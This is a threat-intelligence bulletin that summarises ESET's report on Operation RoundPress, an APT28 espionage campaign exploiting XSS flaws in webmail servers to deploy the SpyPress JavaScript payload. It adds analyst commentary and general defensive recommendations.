Summary:
A cyber espionage campaign, dubbed Operation RoundPress, has been attributed with medium confidence to the Russia-linked threat actor APT28 (AKA Fancy Bear). Commencing in 2023, the operation targets webmail servers including Roundcube, Horde, MDaemon, and Zimbra through the exploitation of XSS vulnerabilities. These vulnerabilities include a then-zero-day flaw in MDaemon (CVE-2024-11182). The primary objective is to steal confidential data from specific email accounts, with a majority of victims being governmental entities and defense companies in Eastern Europe, although targets in Africa, Europe, and South America have also been observed. The attack vector involves sending emails containing malicious HTML code that, upon being opened in a vulnerable client, executes an obfuscated JavaScript payload named SpyPress. This malware can steal credentials, harvest emails and contacts, and in some SpyPress.ROUNDCUBE instances, create Sieve rules to forward all incoming emails to an attacker-controlled email address. Data exfiltration occurs via HTTP POST requests to a command-and-control server. Some malware variants also aim to capture login history, 2FA codes, and create application passwords for persistent access.

Security Officer Comments:
The reveal of Operation RoundPress underscores the persistent threat posed by state-sponsored actors like APT28, highlighting their multi-year focus on exploiting vulnerabilities in widely used webmail servers for espionage purposes. The 2024 targeting of governmental and defense organizations, particularly those involved in supporting Ukraine in their war effort, aligns with known geopolitical interests associated with this threat group. The exploitation of both known and zero-day XSS vulnerabilities across multiple webmail solutions demonstrates a resourceful and adaptable approach. The use of spear-phishing emails with embedded malicious JavaScript, while requiring user interaction, remains an effective initial access vector, especially when organizations fail to promptly patch known vulnerabilities. The SpyPress payload's capabilities, including credential theft, data harvesting, and the creation of long-term access mechanisms like Sieve rules and application passwords that help bypass 2FA, emphasize the likelihood of significant data compromise and prolonged unauthorized access. The fact that other threat actors have also targeted webmail platforms recently suggests that these systems are increasingly viewed as high-value targets due to often delayed patching and the sensitive information they contain. Organizations utilizing these webmail servers must prioritize timely patching, implement robust email security measures, and educate users about the risks associated with interacting with unsolicited emails to mitigate the threat posed by campaigns like Operation RoundPress.

Suggested Corrections:
IOCs are available here.

Organizations can make APT groups’ lives more difficult. Here’s how:

• Defense-in-depth strategy: A comprehensive defense-in-depth strategy is crucial to combat APTs. This includes implementing multiple layers of security controls, such as strong perimeter defenses, network segmentation, endpoint protection, intrusion detection systems, data encryption, access controls, and continuous monitoring for anomalies.
• Threat intelligence and sharing: Ideally, organizations should actively participate in threat intelligence sharing communities and collaborate with industry peers, government agencies, and security vendors. Sharing information about APTs and their techniques can help detect and mitigate attacks more effectively.
• Employee education and awareness: Regular security awareness programs, phishing simulations, and training sessions can educate employees about the latest threats, social engineering techniques, and safe computing practices.
• Incident response and recovery: Regardless of preventive measures, organizations should have a well-defined incident response plan. This includes incident detection, containment, eradication, and recovery procedures to minimize the impact of APT attacks and restore normal operations.

Link(s):
https://www.welivesecurity.com/en/eset-research/operation-roundpress/